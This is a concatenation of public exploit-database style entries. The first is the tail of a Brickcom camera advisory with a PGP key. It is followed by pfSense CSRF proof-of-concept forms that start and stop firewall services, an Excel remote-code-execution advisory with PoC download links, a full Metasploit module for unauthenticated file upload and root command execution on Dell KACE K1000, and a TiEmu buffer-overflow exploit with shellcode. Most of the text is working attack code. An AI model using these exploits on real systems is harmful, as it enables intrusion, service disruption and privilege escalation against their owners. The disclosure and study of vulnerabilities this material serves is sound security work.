Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR
(release:2016-01-18_10:07:03)
Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.17A (release: 2015-07-10_11:36:41)
Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.18.3R (release: 2015-10-15_11:30:46)
Mini Dome Camera
----------------
Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8
(release:2013-08-01)
Cube Camera
-----------
Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release:
09/07/2010 11:45)
Fixed Dome Camera
-----------------
Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R
(release: 2015-08-19_18:47:31)
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
Timeline
++++++++
2015-03-20 - Issues discovered
2015-03-30 - attempt to contact Vendor
2015-12-12 - attempt to assign CVE
2016-04-12 - Not easy way to contact vendor, (ON Twitter) the last tweet
was 2011-01-31...
2016-04-14 - Full disclosure
About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in
embedded device & webapp hacking &&
aims to create some intelligence around this vast and confusing picture
that is the Internet of things.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----
# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps
1. Description
An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.
2. Proof of Concept
Login to the Web Console, for example, http://192.168.0.1 (set at the time of install) and open the following POC’s:
Start NTPD service:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="startservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Stop NTPD service:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="stopservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Restart NTPD service:
POC:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="restartservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The service will automatically start/stop.
Note: That NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="stopservice" />
<input type="hidden" name="service" value="apinger" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Solution:
Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads
#######################################################################################
# Title: Microsoft Office Excel Out-of-Bounds Read Remote Code Execution
# Application: Microsoft Office Excel
# Affected Products: Microsoft Office Excel 2007,2010,2013,2016
# Software Link: https://products.office.com/en-ca/excel
# Date: April 12, 2016
# CVE: CVE-2016-0122 (MS16-042)
# Author: Sébastien Morin from COSIG
# Contact: https://twitter.com/COSIG_ (@COSIG_)
# Personal contact: https://smsecurity.net/; https://twitter.com/SebMorin1 (@SebMorin1)
#######################################################################################
===================
Introduction:
===================
Microsoft Excel is a spreadsheet developed by Microsoft for Windows, Mac OS X, and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. It has been a very widely applied spreadsheet for these platforms, especially since version 5 in 1993, and it has replaced Lotus 1-2-3 as the industry standard for spreadsheets. Excel forms part of Microsoft Office.
(https://en.wikipedia.org/wiki/Microsoft_Excel)
#######################################################################################
===================
Report Timeline:
===================
2016-02-06: Sébastien Morin from COSIG report the vulnerability to MSRC.
2016-02-16: MSRC confirm the vulnerability.
2016-04-12: Microsoft fixed the issue (MS16-042).
2016-04-13: Advisory released.
#######################################################################################
===================
Technical details:
===================
This vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office file (.xlsm). An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user.
#######################################################################################
==========
POC:
==========
https://smsecurity.net/wp-content/uploads/2016/04/Microsoft_Office_Excel_Out-of-Bounds_Read_RCE.xlsm
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39694.zip
#######################################################################################
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dell KACE K1000 File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in Kace K1000
versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
which allows unauthenticated users to execute arbitrary commands
under the context of the 'www' user.
This module also abuses the 'KSudoClient::RunCommandWait' function
to gain root privileges.
This module has been tested successfully with Dell KACE K1000
version 5.3.
},
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => 'unix', # FreeBSD
'Arch' => ARCH_CMD,
'Author' =>
[
'Bradley Austin (steponequit)', # Initial discovery and exploit
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x27",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl'
}
},
'DefaultTarget' => 0,
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DisclosureDate' => 'Mar 7 2014'))
end
def check
res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
unless res
vprint_error('Connection failed')
return Exploit::CheckCode::Unknown
end
if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'
if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/
vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")
if $1.to_i == 5 && $2.to_i <= 3 # 5.0 to 5.3
return Exploit::CheckCode::Vulnerable
elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849 # 5.4 prior to 5.4.76849
return Exploit::CheckCode::Vulnerable
elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547 # 5.5 prior to 5.5.90547
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
# upload payload
fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"
payload_path = "/kbox/kboxwww/tmp/"
post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
print_status("Uploading #{fname} (#{post_data.length} bytes)")
res = send_request_cgi(
'uri' => normalize_uri('service', 'kbot_upload.php'),
'method' => 'POST',
'vars_get' => Hash[{
'filename' => fname,
'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",
'checksum' => 'SCRAMBLE',
'mac' => rand_text_alphanumeric(rand(8) + 5),
'kbotId' => rand_text_alphanumeric(rand(8) + 5),
'version' => rand_text_alphanumeric(rand(8) + 5),
'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle],
'data' => post_data)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code && res.code == 200
print_good('Payload uploaded successfully')
else
fail_with(Failure::UnexpectedReply, 'Unable to upload payload')
end
# execute payload
res = send_request_cgi('uri' => normalize_uri('tmp', fname))
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code && res.code == 200
print_good('Payload executed successfully')
elsif res.code && res.code == 404
fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
else
fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
end
end
end
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
jsacco@exploitpack.com
# Program affected: Texas Instruments calculators emulator (without GDB)
# Version: 3.03-nogdb+dfsg-3
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: TiEmu emulates Texas Instruments calculators TI
9/92/92+/V200PLT.
# Kali Linux 2.0 package: pool/main/t/tiemu/tiemu_3.03-nogdb+dfsg-3_i386.deb
# MD5sum: 79a42bb40dfa8437b6808a9072faf001
# Website: http://lpg.ticalc.org/prj_tiemu/
#
#
# Starting program: /usr/bin/tiemu -rom=$(python -c 'print "A"*80')
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library
"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
# TiEmu 3 - Version 3.03
# THIS PROGRAM COMES WITH ABSOLUTELY NO WARRANTY
# PLEASE READ THE DOCUMENTATION FOR DETAILS
#
# Program received signal SIGSEGV, Segmentation fault.
#
# 0x41414141 in ?? ()
#
# gdb$ backtrace
#0 0xb7fdebe0 in __kernel_vsyscall ()
#1 0xb6ec9367 in __GI_raise (sig=sig@entry=0x6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2 0xb6ecaa23 in __GI_abort () at abort.c:89
#3 0xb6f07778 in __libc_message (do_abort=do_abort@entry=0x2,
fmt=fmt@entry=0xb6ffd715 "*** %s ***: %s
#4 0xb6f97b85 in __GI___fortify_fail (msg=msg@entry=0xb6ffd6fd "stack
smashing detected") at fortify_fail.c:31
#5 0xb6f97b3a in __stack_chk_fail () at stack_chk_fail.c:28
#6 0x0811beb3 in _start ()
import os,subprocess
def run():
try:
print "# Texas Instrument Emulator Buffer Overflow by Juan Sacco"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*84
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*12
eip = "\xd1\xf3\xff\xbf"
subprocess.call(["tiem ",'-rom= ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, Texas Instrument emulator not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit Tiem 3.03-nogdb+dfsg-3 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()